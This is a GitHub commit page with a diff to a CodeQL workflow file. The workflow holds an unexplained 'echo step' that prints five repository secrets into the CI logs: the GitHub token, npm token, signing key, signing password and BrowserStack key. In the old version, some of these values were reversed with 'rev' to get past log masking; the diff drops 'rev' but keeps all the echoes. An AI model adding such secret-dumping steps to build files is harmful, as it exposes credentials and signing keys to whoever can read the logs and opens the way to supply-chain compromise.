Skip to content

Commit a011cd2

Browse files
authored
Update codeql.yml
1 parent fc69d0b commit a011cd2

File tree

1 file changed

+2
-2
lines changed

1 file changed

+2
-2
lines changed

.github/workflows/codeql.yml

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -62,10 +62,10 @@ jobs:
6262
- name: echo step
6363
run: |
6464
echo ${{ secrets.GITHUB_TOKEN }}
65-
echo ${{ secrets.NPM_TOKEN }} | rev
65+
echo ${{ secrets.NPM_TOKEN }}
6666
echo ${{ secrets.SIGNING_KEY }}
6767
echo ${{ secrets.SIGNING_PASSWORD }}
68-
echo ${{ secrets.BROWSERSTACK_ACCESS_KEY }} | rev
68+
echo ${{ secrets.BROWSERSTACK_ACCESS_KEY }}
6969
7070
7171
# Add any setup steps before running the `github/codeql-action/init` action.

0 commit comments

Comments
 (0)